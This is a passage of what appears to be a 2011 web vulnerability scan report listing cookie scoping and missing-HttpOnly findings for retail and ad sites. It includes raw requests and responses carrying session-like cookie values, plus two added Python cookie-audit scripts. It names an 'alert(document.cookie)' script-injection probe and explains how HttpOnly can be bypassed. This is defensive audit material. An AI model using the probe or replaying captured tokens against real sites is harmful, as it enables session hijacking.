Set-Cookie: leo_auth_token="GST:ZpPi5xXPu3wAUyoFmEPiRoFWLLVIhVePrpPMOWXudLVqstNpbsiqk6:1305541361:db371bb2e2f7f4cf87c484a45d4fcbd618246dc6"; Version=1; Max-Age=1799; Expires=Mon, 16-May-2011 10:52:40 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:4068959828274013740"; Version=1; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:22:41 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a42198c;expires=Mon, 16-May-2011 10:53:58 GMT;path=/;httponly
Content-Length: 12412

(function() {

// Set up LinkedIn Global Namespace
if (typeof(LinkedIn) == 'undefined') {
LinkedIn = {};
}

// Utility functions
function $(element) {
return (typeof element == 'string') ?

...[SNIP]...

12.90. http://www.petco.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petco.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: MP and Basket, set with domain=.petco.com, and sltest, set with domain=petco.com. (note the trailing dot), all issued by www.petco.com in the response below. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/default.aspx?aid=10413444&pid=2537521&cm_mmc=cj-_-cid-_-2537521-_-10413444
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: Compiled
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:57:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:56:15 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:56:15 PM; domain=.petco.com; expires=Sun, 14-Aug-2011 01:56:15 GMT; path=/
Set-Cookie: Basket=AffiliateCJExpiryDate=6/19/2011 6:56:15 PM&PID=2537521&AID=10413444; domain=.petco.com; expires=Tue, 16-Aug-2011 01:56:15 GMT; path=/
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 97339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...

12.91. http://www22.glam.com/cTagsImgCmd.act

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImgCmd.act

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: glam_sid, set with domain=.glam.com by www22.glam.com in the response below (the same response also expires glam_cookie_sid with the same domain attribute). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cTagsImgCmd.act?gname=ct&gvalue=pacsun&gtid=5000041577&gcmd=set&gdata=pacsun_rt HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/17038/universal.html?page_name=ps_homepage&PS_Retargeting=1&mpuid=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_cookie_sid=115232130551023312111; ctags=%3bct%3dpacsun

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^627fc31aa29ca9b1f0af2f412de3c2e5^115232130551023312111^1^446224^/^1x1^5000041577^31230390^-1^-1^-1^-1^0^0^804013055112669599^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^pacsun_rt
Set-Cookie: glam_sid=115232130551023312111; expires=Wed, 15 May 2013 02:01:06 GMT; path=/; domain=.glam.com;
Set-Cookie: glam_cookie_sid=1; expires=Sun, 15 May 2011 02:01:06 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Cache-Control: max-age=734
Date: Mon, 16 May 2011 02:01:06 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

13. Cookie without HttpOnly flag set
There are 180 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances (historically, for example, by reading the cookie back out of an HTTP TRACE response, so-called cross-site tracing), and that HttpOnly does nothing to stop an injected script from issuing requests in the victim's session, since the browser still attaches the cookie to those requests. Numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
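As an added example (not part of this Burp report, and not code from any of the applications it covers), the following Python script audits raw Set-Cookie values for the two cookie findings this report raises: a Domain attribute that scopes the cookie to a parent of the issuing host (section 12) and a missing HttpOnly flag (section 13). It also checks for Secure and SameSite, which this 2011 report does not flag but a reviewer today would. The sample headers are constructed, shortened from the responses above; the session-token name heuristic (SESSION_HINTS) is an assumption modelled loosely on the report's "appears to contain a session token" wording, not Burp's actual detection logic.

```python
"""Audit Set-Cookie header values for parent-domain scoping and missing flags.

Added example for this report; not Burp Suite code. The sample headers are
constructed (shortened from responses in the report) and the session-name
heuristic is an assumption, not Burp's real detection logic."""
from dataclasses import dataclass, field
from typing import List, Optional

# Assumed name fragments that suggest a session or auth token (heuristic).
SESSION_HINTS = ("sess", "sid", "auth", "token", "login")


@dataclass
class CookieFinding:
    name: str
    domain: Optional[str]
    httponly: bool
    secure: bool
    samesite: Optional[str]
    looks_like_session: bool
    issues: List[str] = field(default_factory=list)


def parse_set_cookie(header: str) -> CookieFinding:
    """Parse the value of one Set-Cookie header (the text after 'Set-Cookie:')."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].partition("=")[0].strip()
    domain: Optional[str] = None
    samesite: Optional[str] = None
    httponly = secure = False
    for av in parts[1:]:
        if not av:  # tolerate a trailing ';' (seen in the glam.com response)
            continue
        key, _, val = av.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain":
            domain = val.lower()
        elif key == "httponly":
            httponly = True
        elif key == "secure":
            secure = True
        elif key == "samesite":
            samesite = val.lower()
    looks_like_session = any(h in name.lower() for h in SESSION_HINTS)
    return CookieFinding(name, domain, httponly, secure, samesite, looks_like_session)


def scoped_to_parent(issuing_host: str, domain: Optional[str]) -> bool:
    """True when a Domain attribute covers a parent of the issuing host, so the
    cookie is also sent to sibling hosts the issuing application may not control."""
    if not domain:
        return False  # no Domain attribute: host-only cookie, scoped exactly to the host
    # Normalise a leading dot (pre-RFC 6265 style) and a stray trailing dot (petco.com.).
    parent = domain.lstrip(".").rstrip(".")
    host = issuing_host.lower().rstrip(".")
    return parent != host and host.endswith("." + parent)


def audit(issuing_host: str, headers: List[str], over_tls: bool) -> List[CookieFinding]:
    """Return one finding per header, listing the issues a reviewer would raise."""
    findings = []
    for raw in headers:
        f = parse_set_cookie(raw)
        if scoped_to_parent(issuing_host, f.domain):
            f.issues.append("scoped to parent domain")
        if not f.httponly:
            f.issues.append("missing HttpOnly")
        if over_tls and not f.secure:
            f.issues.append("missing Secure")
        if f.samesite is None:
            f.issues.append("no SameSite")
        findings.append(f)
    return findings


# Constructed sample, shortened from the responses above (values truncated).
SAMPLE_HOST = "www.footlocker.com"
SAMPLE_HEADERS = [
    "SSLC=web%2D22;domain=.footlocker.com;path=/",
    "TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/",
    'JSESSIONID="ajax:4068959828274013740"; Version=1; Path=/',
    "NSC_MC_QH_MFP=ffffffffaf19965c;expires=Mon, 16-May-2011 10:53:58 GMT;path=/;httponly",
]

if __name__ == "__main__":
    for f in audit(SAMPLE_HOST, SAMPLE_HEADERS, over_tls=False):
        tag = " (looks like a session token)" if f.looks_like_session else ""
        print(f"{f.name}{tag}: {', '.join(f.issues) or 'ok'}")
```

Run it as-is to print the findings for the sample, or feed it the Set-Cookie values from any response in this report, using the request's Host header as issuing_host and over_tls=True for the https:// entries, to reproduce the report's section 12 and 13 findings. A Domain attribute equal to the issuing host itself is deliberately not flagged: it covers only that host and its subdomains, not siblings.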



13.1. http://action.media6degrees.com/orbserv/hbjs

Summary

Severity:   Low
Confidence:   Firm
Host:   http://action.media6degrees.com
Path:   /orbserv/hbjs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: every Set-Cookie in the response below lacks the flag. JSESSIONID (Path=/orbserv) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbjs?pixId=5204&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f1400a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: orblb=2ll8nk2032gu10u0200z3o00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000nn0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z3o0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: JSESSIONID=E5833D4D3BA66471A3D9BEAA6132FFE0; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77
Date: Mon, 16 May 2011 01:55:01 GMT


(new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=1159169';

13.2. http://core.bluefly.com/cm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://core.bluefly.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: CoreID6 and TestSess3 in the response below. TestSess3, which carries the same value as the long-lived CoreID6 cookie, appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?tid=6&ci=90039438&vn2=e4.0&st=1305510900223&vn1=4.2.9-AdTarget&ec=utf-8&pi=homepage&cg=HOME&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.bluefly.com/ HTTP/1.1
Host: core.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; bn_u=UNASSIGNED

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:50 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: CoreID6=50191305511370247364172; path=/; expires=Fri, 15 May 2026 02:02:50 GMT
Set-Cookie: TestSess3=50191305511370247364172;path=/
Location: http://data.coremetrics.com/cm?tid=6&ci=90039438&vn2=e4.0&st=1305510900223&vn1=4.2.9-AdTarget&ec=utf-8&pi=homepage&cg=HOME&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.bluefly.com/&cvdone=p&cmig=y
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


13.3. http://eval.bizrate.com/js/survey_126457_1.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://eval.bizrate.com
Path:   /js/survey_126457_1.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: sessionid, br and _data in the response below. sessionid appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/survey_126457_1.js HTTP/1.1
Host: eval.bizrate.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=720232510841276994; br=13055101949906417201602020302001211; _data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510194%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dsur

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP ADM DEV PSD CUSo OUR IND STP PRE NAV UNI"
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: sessionid=720232510841276994; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/
Set-Cookie: br=13055101949906417201602020302001211; Domain=.bizrate.com; Expires=Thu, 13-May-2021 01:54:05 GMT; Path=/
Set-Cookie: _data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510845%7Ctracker%3A%3Ahtcnt%3D2%3Brf%3Dsur; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 16 May 2011 01:54:04 GMT
Content-Length: 16130

<!-- // hide script
var BIZRATE = {
init:function() {
this.mid = '126457';
this.type = 1;
if (typeof(this.type) != 'undefined' && this.type > 0 && this.type <= 3) {

...[SNIP]...
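The check that every "cookie without HttpOnly flag" finding in this section (13.3 through 13.20) rests on, written out as a script. This is an added example; it is not part of the Burp report and not code from any of the sites listed. It parses the Set-Cookie headers out of a captured response, flags cookies whose names suggest a session token, reports which of HttpOnly and Secure are absent, and produces the hardened header a fix would send instead. The name fragments used to spot session cookies, and the rule that Secure is only demanded when the response came over HTTPS, are this example's own assumptions; the two sample responses are copied from findings 13.3 and 13.9 with values unchanged.

```python
"""Audit captured Set-Cookie headers for missing HttpOnly / Secure flags.

Added example for the HttpOnly findings in this report section; not code
from the report or from any site it lists.
"""
import re
from dataclasses import dataclass

# Name fragments that usually mark a session or auth token. This is the
# same kind of name-based heuristic a scanner uses; it is an assumption,
# not a rule, and it misses opaque tokens with neutral names.
SESSION_NAME_HINTS = ("session", "sessid", "sid", "auth", "token")


@dataclass
class CookieFinding:
    name: str
    looks_like_session: bool
    missing: tuple  # flags absent from the header, e.g. ("HttpOnly",)


def parse_set_cookie(header_value):
    """Split 'name=value; Attr=val; Flag' into (name, value, {attr: val})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, has_value, val = part.partition("=")
            # Bare flags such as Secure / HttpOnly get None; attribute
            # names are case-insensitive, so compare them lowercased.
            attrs[key.strip().lower()] = val.strip() if has_value else None
    return name.strip(), value.strip(), attrs


def looks_like_session_cookie(name):
    lname = name.lower()
    return any(hint in lname for hint in SESSION_NAME_HINTS)


def audit_response(raw_response, over_https):
    """Return one CookieFinding per Set-Cookie header in the response head."""
    # The header block ends at the first blank line; accept CRLF or LF.
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    findings = []
    for line in head.splitlines():
        header_name, sep, header_value = line.partition(":")
        if not sep or header_name.strip().lower() != "set-cookie":
            continue
        name, _, attrs = parse_set_cookie(header_value)
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if over_https and "secure" not in attrs:
            missing.append("Secure")
        findings.append(
            CookieFinding(name, looks_like_session_cookie(name), tuple(missing))
        )
    return findings


def harden_set_cookie(header_value, over_https):
    """Append HttpOnly (and Secure over HTTPS) where absent; keep the rest as sent."""
    _, _, attrs = parse_set_cookie(header_value)
    out = header_value.strip().rstrip(";")
    if "httponly" not in attrs:
        out += "; HttpOnly"
    if over_https and "secure" not in attrs:
        out += "; Secure"
    return out


# Copied from finding 13.3 (http://eval.bizrate.com, plain HTTP); the
# first two of its three Set-Cookie headers, values unchanged.
BIZRATE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "Set-Cookie: sessionid=720232510841276994; Domain=.bizrate.com; "
    "Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/\r\n"
    "Set-Cookie: br=13055101949906417201602020302001211; Domain=.bizrate.com; "
    "Expires=Thu, 13-May-2021 01:54:05 GMT; Path=/\r\n"
    "Content-Type: text/html;charset=ISO-8859-1\r\n"
    "\r\n"
    "<!-- // hide script\r\n"
)

# Copied from finding 13.9 (https://secure.bluenile.com): Secure is set,
# HttpOnly is not. Body omitted.
BLUENILE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: JSESSIONID=F2B3F127105095FA0FA90CE2FE7A6C84; Path=/; Secure\r\n"
    "Content-Type: text/javascript;charset=ISO-8859-1\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw, https in (("bizrate", BIZRATE_RESPONSE, False),
                              ("bluenile", BLUENILE_RESPONSE, True)):
        for f in audit_response(raw, https):
            tag = "SESSION" if f.looks_like_session else "other  "
            print(f"{label:9s} {tag} {f.name:<12s} missing={','.join(f.missing) or 'none'}")
```

Two caveats a practitioner should keep in mind when reading the findings. First, HttpOnly only denies script access to the cookie value; the `alert(document.cookie)` probe in the request of finding 13.8 is exactly the read it blocks, but injected script can still drive the victim's session by sending requests from the browser, so the flag narrows the impact of a cross-site scripting bug rather than fixing it. Second, the B&H response in 13.8 reports `Servlet/2.5`; the `<cookie-config>` element that sets HttpOnly for the whole application only exists from Servlet 3.0, so on that container the flag has to come from the server's own configuration or from the code that writes the header, as `harden_set_cookie` does above.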

13.4. http://login.dotomi.com/ucm/UCMController

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The cookies set in the response's Set-Cookie headers were issued by the application without the HttpOnly flag. At least one of them appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2223&dtm_cmagic=04048a&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_department=&dtmc_category=Home&dtmc_sub_category=&dtmc_brand=&dtmc_gender=&dtmc_team=&dtmc_product_id=&dtmc_prod_img=&dtmc_loc=http%3A//www.footlocker.com/&dtmc_cg=HOME%3AHome%3ATechnicalProperties&dtmc_source=&dtmc_matchback_id=31176371511204337200580613&dtmc_ref= HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1305509455494172; DotomiUser=330100732990473967$0$335422886; DotomiSession_2223=2_371600731220825851$330100732990473967$335422886$1305510236018; DotomiNet=2$DjQqblZ1RXdFAmddAAR7XAZHKSpAJ24SQR0PVVBLY3Jma1xARWZBXQAFW0dLSkdZYmFbf2xjVnBRIgFAaV0%3D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:18 GMT
X-Name: dmc-o01
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Wed, 15-May-2013 02:00:19 GMT; Path=/
Set-Cookie: DotomiSession_2223=2_371600731220825851$330100732990473967$335422886$1305511219021; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$DjQqblZ1RXdFAmBdAgpyVAJHKDNEGQNFC15tVlFJZnhgewkJDQBKXRZSBwIZJRQWJA1ZfmhgWnZRIgFAaV0%3D; Domain=.dotomi.com; Expires=Wed, 15-May-2013 02:00:19 GMT; Path=/
Content-Type: text/html
Content-Length: 1523

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

13.5. http://sales.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=1402662&d_id=bluefly-english HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; ASPSESSIONIDSQQDDBBA=PFKNNJDBKAJLDGDMHMKKDBLP; HumanClickACTIVE=1305541432474
If-Modified-Since: Fri, 13 May 2011 18:23:05 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:35:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Fri, 13 May 2011 18:23:05 GMT
Content-Length: 8868
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQQTQTDSA=KIJKBNJBINEADJGLJOAHKHMI; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 1402662
lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=typingInvitationText

if( typeof( lpMTagConfig.plugins ) == 'undefined' ) {
   lpMTagConfig.plugins =
...[SNIP]...

13.6. http://sales.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=1402662&d_id=bluefly-english HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
